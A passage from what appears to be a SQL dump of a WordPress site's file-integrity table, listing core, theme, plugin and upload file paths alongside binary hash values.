Wp1�CJD�?�3�0\Z�ڕ��Q��\"E','',0,'?'),('E�$����K��cm','wp-content/plugins/wp-cerber/languages/wp-cerber.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U����:F���ӳ�','?HM�$=b��geoOyt�9�!���T��/��\r1','',0,'?'),('E�V��,�%��,SM=','wp-admin/ms-edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P3�\n��7|L?MtA���','a����c�sc\Z���\"�V�L\\�њ�','',0,'?'),('E����L�h�l���,�','wp-content/themes/vega/assets/js/html5shiv.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wj�e*ݑ��\'��','�J�GU$ܫ�3�ރ��E��:O2�%�!-���','',0,'?'),('E�B3A���-\r�&!�T','wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�o��y�벍cK�',':P��cc�z�\"�����Q�a���QZ�d','',0,'?'),('E�S�\Zʻ��� \nG','wp-content/plugins/wordpress-seo/languages/wordpress-seo-es_EC.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�f[����(� �#�','���SG����ǤH�0�J��/H���`','',0,'?'),('E�PqC��E/@�!','wp-content/plugins/wordpress-seo/js/dist/languages/id-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8*��mi>��g�','q,z��* �4�_-}ޥ꿳\Zz}�6��ϕ','',0,'?'),('E�Dc�9�>�� ��v','wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9�H��듦)�x��','pYq�e�\'I\n:�\0�y%G�C-|M�gf��','',0,'?'),('E�e&��0�\'�0��٣','wp-content/plugins/wp-cerber/assets/flags/ga.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`#�HG�)����4X�','�NvX���aa %�Q�U�SJX;M.G�j','',0,'?'),('E����`9��]','wp-content/plugins/wordfence/js/date.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j��P�ER�_�c�','��B=��0�dƩ\"B�tUc��^1�>�q&�','',0,'?'),('F�Hȝl�e��#�','wp-includes/js/tinymce/skins/wordpress/images/more-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l,��r�%�^x�%','���Y=�_�b��|ʧ&f,��<�������','',0,'?'),('FH�5�@�ʹ.a','wp-content/uploads/2016/11/cropped-lost-places-768x240.jpg',0,'�3�L�?\"�`a��','�3�L�?\"�`a��','�fYX�6q\\֘k��1L�\Z��P���PR]t���','',0,'?'),('Fq�����E؇��','wp-content/plugins/wp-cerber/assets/ui-stack.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N3�ߪ���(Q','�\"%cb�[$2��\Z��\rN�w`� �?&�L�\\','',0,'?'),('F\r�x�w~�\rܱ��\n�','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&du��;�M��z�w�','L�a�qT?h$�6��=�Je��$Q��RLt','',0,'?'),('F1+\Z#�+d�{�w�{','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.D6�p�i�r`�fw�=','�2��KJ73��x�2�M2��&�+���L��L','',0,'?'),('FCW.�3���\Z��U�','wp-includes/js/jquery/ui/checkboxradio.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂��_���>��Klk','Ě�8�\nm��r+\"�?�~iLOVR~��C','',0,'?'),('FF�v��V;v�8/�\r��','wp-includes/SimplePie/Misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I��\Z��}[�X�rb^','U�l?l�N�v6�0\'�,��(N��\0�&��','',0,'?'),('FH���30m�:��s��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xR� �Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('FVJ�%T�yً�e�','wp-content/plugins/wordpress-seo/src/integrations/admin/cron-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#��[.FpR��b','�ִkT��zgJ��g�B�je)�L�3','',0,'?'),('FZ��!��\"����g','wp-content/plugins/wordfence/css/activity-report-widget.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�^x;y�����c���','�ӡ��f�aM�Wv+�W�%}��`D�N��','',0,'?'),('F`M߸c�N�!����','wp-includes/blocks/image/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�BU�� i��l��0`','H�/ۤ�{�mť\0!�8�U8��9\r�Il9���p5','',0,'?'),('Fc�X&�m���cp&','wp-content/languages/plugins/wordpress-seo-en_GB-d41c973753f426a1b68d71dc36e21ac1.json',0,'�l��B.�\Z:�!�F<','�l��B.�\Z:�!�F<','�/�����f(W��PV�n\r*D���@{3Q�','',0,'?'),('Fg��5�F\n�+�93','wp-content/plugins/wp-cerber/cerber-ds.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��CcBP�\"��~�',']����9�e0�`����T�]�Q�}`�a�','',0,'?'),('F|����w�ZQ,O��','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/dist/random_compat.phar.pubkey',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6���?�\n� :�{Q%','���Z�IK/I��w¥�Ovy�E�Bi\\$G�&','',0,'?'),('F}3�(�̬�OI ��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j;�ʻ��#��qb','m7w�W���&em�C������1��a�c =27','',0,'?'),('F���Ժ6��ފ\0�Q','wp-content/plugins/wp-cerber/assets/flags/by.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Fƞ�01���','R8�;��k�m��l�X��V�6�V�\"��ď','',0,'?'),('F�\\�C?�Z���','wp-includes/css/customize-preview-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��މ����ګd��3','~�\'��[z�{��:����LĀN7A�� ','',0,'?'),('F��Ã\\�O�fg�','wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1����v��R','N3G�\'�`��+R>�P]E�γg/�b?���UX','',0,'?'),('F�\'�B�/�4{J�{w','wp-admin/js/edit-comments.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\n�k)Զ����W','�2~���[5��{\0���^�|��v��TO��I','',0,'?'),('F�\\\"�L����,4ꫥ','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/RequestFactory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�y���[ޙm�M^','��g��=H�ӗ���ւ�H��w/~����p--','',0,'?'),('F�x�\Z4I�hGbC@��a','wp-content/plugins/wordpress-seo/src/helpers/current-page-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�l�L��$�fmd_�','{�P�~�3��ᅜD��v���XJZ�b�','',0,'?'),('F�p�J�,��`ndXV','wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���J��@E^G_�','Q/W{xn�� �c�!�ld��{�WP.,Gn��0','',0,'?'),('F�G+�<sCeK#X\\','wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�8��T��2y�ɜ','ʵM«�Fc��/����\0���{��̰P�� ','',0,'?'),('F���?�C;$��H\r\r','wp-admin/css/color-picker.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z=�����EG�> �1\Z<','t-�]Lb8�n�d�\\pm^�����i[�c�\Z��','',0,'?'),('F�.�c����\n��$`�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-manager-vip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�h��y�O\\�P˶�\0F','k�v�\'��<��\Z�k�.�.�> q��v��}EO�','',0,'?'),('F�V����Od%�|u�','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('G Xe�x��w0\\�o8','wp-includes/Requests/Response/Headers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��dVND1�C����.','�?�\\v���ҧ�x�P�Ep����6��!IP','',0,'?'),('G6U�2\01R������J','wp-admin/js/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�GZ�[���c�','\'���f\\V\Z�ʟ(��Y�uqD�g1S e2�\r','',0,'?'),('G:Z��]Y!tI����\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jI78�{��r�P�','Uk�������ZM=OEw�D���w�� |I�;','',0,'?'),('Gi9��$�Lвu��U߬','wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6>}�\r+�D>��y','M��.��k�~�_+>`=�HϮ�2^x�E�o�','',0,'?'),('Gm��:�MľV��LЉ','wp-includes/js/tinymce/utils/editable_selects.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��q2��I\'�J�9�E','�v��Gjs��f�� e�d�&�g��+���','',0,'?'),('Gq�b٫ ������s�','wp-content/plugins/wp-cerber/assets/bn2ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8�^ְ��sO','g���c}�;\'�B��9�ق�\Z4CW��JR�%��','',0,'?'),('Gu�������ʭ�','wp-includes/class-wp-meta-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������!<�һ-�','��R�����l�� �n���\\��h����ݢ','',0,'?'),('Gu5���aԯ��','wp-includes/rest-api/search/class-wp-rest-post-search-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}*�yY��ը�F�','1��SD��v�jk3�\0�G�<�\'|��!���','',0,'?'),('Gu�^�/1��ՁS�7','wp-includes/atomlib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2*rMb3ы�y��','��:��8��px� ��������}��)�!�','',0,'?'),('G|g��ڧj��X)�H�','wp-content/uploads/2019/06/fibre-optic-150x150.jpg',0,'C1���,\r_Qt�|A','C1���,\r_Qt�|A','�W�*���W<reE�z5�~)�����r','',0,'?'),('G�9q���=ʥ[3?a�','wp-admin/images/bubble_bg-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϭq�j��\n�X�<','n��%4��L���6{�/Т[�Ĭ?XW_A.r','',0,'?'),('G�7\Z��I&:�x','wp-admin/edit-form-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<x<�6�B=�L^��W ','i�2�Ւ 9�K69��֦��x�� P�U�','',0,'?'),('G�e������l|��Y','wp-content/plugins/wordfence/modules/login-security/js/admin.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��ej����\'�I�7','U�%j�Għ���|]S�Щn2��P�T�+J','',0,'?'),('G�����˰��*��','wp-content/themes/vega/parts/frontpage-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!����0ij�u8��>�','�Kq�F9������Uho�}�a�\n�2; l��','',0,'?'),('G��4o�c��%�k�','wp-content/plugins/wordpress-seo/src/integrations/admin/admin-columns-cache-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�|k�H&~����o0�','¸H�W^��BN�mH�0�p���jI�� ���','',0,'?'),('G�d���IέיDj','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/grade-system/wp-security-feature-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���f�R���emV�k','����I�C�O�Y�ʋp �0Ox�1{t<�','',0,'?'),('G�?�yİ���~r&','wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s���#�Rw�ij\n��','&T�)\'4:���\"v�t*���\n�����J\ZR�','',0,'?'),('HW�\njO{0,ݢ��','wp-content/plugins/redirection/locale/redirection-es_VE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\ZC���wΫB]�2�',':��Y��,�J�Ks���_� ����f�f�S�U','',0,'?'),('HQ����b{W���g','wp-content/themes/vega/assets/js/jquery.smartmenus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��\Z9��K��f�ˬ','�@)�szܤ��}x ��_���qzA��^��З\\','',0,'?'),('H�\0 �� N�HB]I','wp-content/themes/twentytwentyone/template-parts/content/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�8�{N����W�L','�>��Q�#*������^�_(VY&I�@H�҇[�','',0,'?'),('H�Y�fUH�u�pd','wp-includes/Requests/Exception/HTTP/400.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^�oA��hܦ3�\Z','�d�>���� �i�H����b$�&�n���6�p\Z','',0,'?'),('He�ډ� 71�pw�','wp-content/languages/themes/twentytwenty-en_GB.po',0,'������z;��','������z;��','�F�f�w��K�B7]F�@`�/y�oD��R��','',0,'?'),('H+�E~�}�1Q���','wp-includes/js/wp-util.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�76 �7$\'�/�\nC��','G7�r<pS�C��\\����zʋ�I�G�','',0,'?'),('H7� �K��ȏLM^0��','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720.jpg',0,'���6ܚ��pm��qc�','���6ܚ��pm��qc�','���O˵:�rYN�/��:�t�M���','',0,'?'),('HA���f�,���$F-�','wp-admin/css/customize-nav-menus-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��T�䐄7[�h\r�','a푥�]�y�����`�|�h���r�U���','',0,'?'),('HGh\'�x�R���~\n','wp-admin/js/customize-nav-menus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� \n7MXr�xT��\n3�','�rl����b,���l�*ẜ\"[�8 /K�0:�*g�','',0,'?'),('HG��I�삞�oZN�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('H`�\\� �r���Y�C','wp-admin/includes/class-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�ȣ�\0���O�)l+','u��S����u�����iD�p�,\\��C�M5�','',0,'?'),('Hmϡ\n��\0M�}0\"ؒ�','wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%�L�AZ;ߪ��u','�� ��w�M���ӳY�\r�%��%�\'�aO�A&�x','',0,'?'),('H��͇>\n{����\0{','wp-content/plugins/wordpress-seo/src/actions/semrush/semrush-phrases-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�|;b���ETd1','�&��Jũ)�_9������6�Ѳ�lA�[{/�','',0,'?'),('H���a��s��3\\*!','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-vi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9%�.t���EH>','�ژB�,�k����c�o1�~W�*','',0,'?'),('H���c����/�Y6','wp-content/plugins/wordpress-seo/css/dist/modal-1690-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AtgߌTy��','�)��G�5n�#j�{�~�1�ayloM5��oGQ�','',0,'?'),('H��Y6o��D{�LH��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u.S��y�l�=\0C�>','�?�\\x`��Q�=���8:�v�sT��','',0,'?'),('Hý��i�Z�U,H�L','wp-admin/includes/meta-boxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bZJ-Q�!�eLU[g�','$Ƙ-����+��_��I�ښi����\r�2��','',0,'?'),('H���C�Tp(^��l�','wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o���\nq]\\:\\c�','<��\'@�þ���Zh��Ӏ���o�@>����','',0,'?'),('H��!��[?�z>����','wp-content/plugins/akismet/class.akismet-rest-api.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⺅�:K���7&Z9Hc','�*�F��:��Å=IH\'x��\\\"��\'��:','',0,'?'),('H�0Zk�z|� �\r�+','wp-includes/pomo/pomo/plural-forms.php',0,'s_7�;� ]�Lvlɟ','s_7�;� ]�Lvlɟ','��T�U#:`B=����ۙNy3�����J�','',0,'?'),('I\r8p:́ ޞ}`�\Z�','wp-includes/blocks/query-pagination/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T����DڀB��','��\\��dIEd��Y���D�H5m����)�','',0,'?'),('IW�9�a��W��3(','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q�W��\0�N(�','����z�4dһ�`�� \0B5��M�� ����','',0,'?'),('Il��K��җ�__n','wp-content/uploads/2016/11/kitchen-2165756_960_720.jpg',0,'�2�V���H��5��t�','�2�V���H��5��t�','�\\�0�\ZF#�W�������Q̯�f;�f0#','',0,'?'),('I0��S�$2�T�B*','wp-includes/widgets/class-wp-widget-calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t�#kjX�b�/�0�E','����u.�)G�F��9?4� �*2�>G\'l','',0,'?'),('I6.:\n(��i\0B��','wp-includes/rest-api/fields/class-wp-rest-user-meta-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�����Z)�*j�D','�z7���cb{�9\ZJ�0ӣ�7�}�\"ϽR�[\n[�','',0,'?'),('I6U�\r7����3p�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h<��|�7b����','��_�^F\"��;+r&Z~ӦQ����|�5�','',0,'?'),('IQM{��:�\r|�6c�e','wp-content/plugins/wp-cerber/assets/flags/il.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��~����3�24�Z�','�b=1<�:�1�ƭ��nn���`�%ޘ��Ϯ�','',0,'?'),('I��:Bs�#���@�','wp-blog-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_BZF1���y����)',';\Z�/\\b���t���I���͝���h��w�','',0,'?'),('I�e��Lk�F�^4A[','wp-content/plugins/wordpress-seo/src/deprecated/frontend/breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�,��;�&���','B��1WfNy��*�\"]���5ٖMn���','',0,'?'),('I�&{��;�-H��','wp-includes/blocks/site-logo/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�\'�6йs�s�(','�0�\n-}�#�~�(7�?\r����a\0�X','',0,'?'),('I�Ԭ�l��v0O','wp-includes/js/dist/core-data.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\n��Ν.8�d�n���','#�E)�0:�Qm�����f��#��1NQ','',0,'?'),('I�PE�Xt�FH�%�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0��Lv�[c��)?','�C�h!݀F$�}�wd�7b(�!�p�IF.L�','',0,'?'),('I��8߽�T�\Z����0�','wp-includes/blocks/list/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:{���LF7�B{\rt','��y��υH���PM��7�����1��F�m!','',0,'?'),('I�m=!�.������','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-system-page-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���?<���E��Qr�','�7�xm�I�P����zay�ҁzr���s���@','',0,'?'),('I�V/��6�s��','wp-admin/js/editor-expand.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','´R�[��6\\gTԄL_�','�vI\n6��6��%VG��}����@of�e;','',0,'?'),('J�%.��~�q�l�','wp-includes/class-wp-text-diff-renderer-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�����g0HFuI�','�_h+�U��H�i��_��e� w����6��','',0,'?'),('J?#�͌$M�7�c�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�I.:���`PR�','#z��R�\ZHU���>B�nP,���\'�eT�tߺ','',0,'?'),('J\n#F?�ٴ�T�n��,','wp-content/uploads/2019/12/pexels-photo-2098443-300x200.jpeg',0,'2�x��g�\0�X�O�','2�x��g�\0�X�O�','�\r��hK*�2�C��u�3.��-Q�=7�9��; ','',0,'?'),('Jf�3?���_r�C�','wp-admin/images/w-logo-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n���Jvۢ~�y�\\�','n��D��� _�;�!G�םcV�0M9i�=�','',0,'?'),('J��E[�7U��\Z�~','wp-includes/js/plupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̢*FL������ P','��i>ۍ�^��%���HhS��\"��X�o�\"','',0,'?'),('JyQl��D�!�HV�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-bot-protection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ɩ}�7\"]� Q�P|','�]a��;�tMY^�v�6�j����ꬆ��','',0,'?'),('J.��Ǝ=U˹!\\X','wp-content/plugins/wordpress-seo/src/presenters/open-graph/type-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ϴ�h�Utو��','��N2���t��T@�᭼�o���E�Xe]�&��h','',0,'?'),('J0N����q\'�t�o#','wp-content/plugins/wordpress-seo/src/integrations/watchers/addon-update-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�\0�t*�߷���}B','f��mSfZ:��Rj\'�cd�� s9����J4','',0,'?'),('J8�E��Dh+���F','wp-admin/js/site-health.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�IdC����VP�Q_','fz,,x��wZ\n\0\"�|�\"�ZI���`��xG�','',0,'?'),('J]��1��U˪|^\Z','wp-content/uploads/2019/12/pexels-photo-164005-1024x681.jpeg',0,'����{�_>�h�Tg�G','����{�_>�h�Tg�G','�7?�����\\�Vg.�ha%���R@�gj��]','',0,'?'),('Jl���1������','wp-content/plugins/wordfence/models/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('J{�ֹZi^ùx�I','wp-admin/media-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�$��q���~{�','X��M�p�Rmp�r�<U���7���8l~��','',0,'?'),('J�� +D��y*ߪޙ','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/tk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|W*hǏ���}�x��','v��P�Z���UY�ꂒ�~_Y���?�r^G��','',0,'?'),('J�>����\"��/','wp-includes/Requests/Auth.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+����y-uP�5�M9н','k����w�6XN\r�����0�c����Ֆ�','',0,'?'),('J���;<��C{߫��N�','wp-includes/blocks/spacer/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Iċ\r�뺈_j��|�t\'','.B��8���2U�����i�W�f\"o�\Z�i�O','',0,'?'),('J���W0t<�W��','wp-content/themes/vega/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�]h��b���EiL�','T��~9\r��-F�M�ȋ��P���AsS�L�#�','',0,'?'),('J�����Ǵ�Ծ�c�','wp-content/themes/twentynineteen/images/pattern_01.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�;�QB��X����','��(��3�g`&}�5)�s��}me2�G��[�','',0,'?'),('J�E�E���>�2v��K','wp-content/plugins/wordpress-seo/lib/model.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$��?��\n؎J��','\Z2\Z�iC�y��p��80��� ���','',0,'?'),('J�%A�nN��O�[̨�','wp-content/plugins/wordpress-seo/src/deprecated/admin/recalculate/class-recalculate-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#i&�1�a������','M��*˃�ؙ��1�\n,$}���nJ1~=','',0,'?'),('Jլ4��\r�n���','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('J�C�{5{����','wp-content/plugins/wordpress-seo/js/dist/languages/tr-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�J���X�T�6��','�4,D�!!{��ɵ�\".��X:�6��xg�F','',0,'?'),('J��Oh��sDؾ','wp-includes/js/zxcvbn.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','| ���#PV /{�M�_','v�XI�9��n�1e�6��C�\\�.p+�\"��K�','',0,'?'),('K�,��<�fƑY�','wp-content/themes/twentytwenty/inc/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�Z\'F��$�)AVˡ','γ���C�(Fu���?��qtk!\r�\nw�;=�5�','',0,'?'),('K���ߺ�b�','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���z�x��C�}','�Nܓ�#d�t�B!\"M՞�==�@o��','',0,'?'),('K\Z+S�3G39��','wp-content/uploads/2016/11/taupe-kitchen-cabinets-contemporary-with-range-in-island-wine-and-bottle-openers-updraft-pre-smush-original.jpg',0,'T�=��dMh����.','T�=��dMh����.','47�&o�N��k��}l�oX�hթ��V/8nN��','',0,'?'),('K0���\r��ܐcn�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�29Y¿,E#�/����','� � ��h<)s��>-P��{���K���I�\0��','',0,'?'),('K9\Z�F�Qȸ\r$^&p��','wp-content/plugins/wp-cerber/languages/wp-cerber-uk.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��q�A�~P�� ','*qn>�4����&�og�e��eʓ��˹^�5��','',0,'?'),('K>�^[�P�F�1�h:','wp-includes/blocks/social-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G�ѻx�z��T@\"�','N�<Ě]�\r�$� �n��ѝ�_O��d��','',0,'?'),('KKOf�Sd�iB0Ov��','wp-content/plugins/wordfence/views/scanner/scanner-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�um��&�(�!���)','���I0-��=�Q5��S�G�LFx��h�','',0,'?'),('KV�h±Q/����Ø','wp-content/plugins/wordpress-seo/languages/yoast-components-pt_BR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_:�v~\0ʙ�W��(���','`8]�T��=Ï�_�����Jb]�<i1wa,','',0,'?'),('K~l�!sr�W����2�s','wp-content/uploads/2016/11/kitchen-2486092_960_720.jpg',0,'�\'��BY=y�^Ԯ�\'�','�\'��BY=y�^Ԯ�\'�','E4ί�D��jv9�<�Y�����b��ѿ�a�y','',0,'?'),('K�nҋD&sR�WU(�','wp-admin/css/farbtastic.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�^�:�G�(���:k\n','4��7V�f�� �/��������D��W3p','',0,'?'),('K���R 